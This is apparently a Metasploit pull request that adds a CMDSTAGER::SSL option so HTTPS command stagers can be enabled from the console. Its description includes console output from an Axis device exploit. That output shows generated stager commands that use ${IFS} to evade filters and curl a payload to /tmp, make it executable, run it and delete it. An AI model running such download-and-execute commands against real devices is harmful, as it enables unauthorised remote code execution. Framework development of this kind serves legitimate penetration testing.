### PR TITLE
Add CMDSTAGER::SSL datastore option

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -56,7 +56,8 @@ module Exploit::CmdStager
     register_advanced_options(
       [
         OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
-        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.'])
+        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
+        OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
       ], self.class)
   end
 
@@ -129,6 +130,7 @@ module Exploit::CmdStager
     self.stager_instance = create_stager
 
     if stager_instance.respond_to?(:http?) && stager_instance.http?
+      opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
       opts[:payload_uri] = start_service(opts)
     end
 


### PR DESCRIPTION
It has come to my attention that since I added the HTTP(S) command stagers, no one has used HTTPS. This is probably why.

The `CmdStager` options hash takes precedence over any datastore options, so **it was possible to enable SSL/TLS command stagers in code, just not in the console**. This corrects that.

- [ ] Add something like `CMDSTAGER::SSLVERIFY`?

```
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl
cmdstager::ssl => false
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/hFsBy6j
[*] Local IP: http://192.168.1.3:8080/hFsBy6j
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/KpooVluv${IFS}http://127.0.0.1:8080/hFsBy6j;chmod${IFS}+x${IFS}/tmp/KpooVluv;/tmp/KpooVluv;rm${IFS}-f${IFS}/tmp/KpooVluv"]
^C[-] Exploit failed [user-interrupt]: Interrupt
[*] Server stopped.
[-] run: Interrupted
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl true
cmdstager::ssl => true
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: https://0.0.0.0:8080/i4loX67WE8W9HkZ
[*] Local IP: https://192.168.1.3:8080/i4loX67WE8W9HkZ
[*] Generated command stager: ["curl${IFS}-kso${IFS}/tmp/XWGCoCbc${IFS}https://127.0.0.1:8080/i4loX67WE8W9HkZ;chmod${IFS}+x${IFS}/tmp/XWGCoCbc;/tmp/XWGCoCbc;rm${IFS}-f${IFS}/tmp/XWGCoCbc"]
[*] Command Stager progress - 100.00% done (154/154 bytes)
^C[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/axis_srv_parhand_rce) > edit
msf5 exploit(linux/http/axis_srv_parhand_rce) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
index 540aa59299..a5d36e801a 100644
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_memory
       execute_command(payload.encoded)
     when :linux_dropper
-      execute_cmdstager(flavor: 'curl', nospace: true)
+      execute_cmdstager(flavor: 'curl', nospace: true, ssl: false)
     end
   end

msf5 exploit(linux/http/axis_srv_parhand_rce) > rerun
[*] Reloading module...

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/Esl30G3
[*] Local IP: http://192.168.1.3:8080/Esl30G3
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/ShmfZwQH${IFS}http://127.0.0.1:8080/Esl30G3;chmod${IFS}+x${IFS}/tmp/ShmfZwQH;/tmp/ShmfZwQH;rm${IFS}-f${IFS}/tmp/ShmfZwQH"]
```

#11128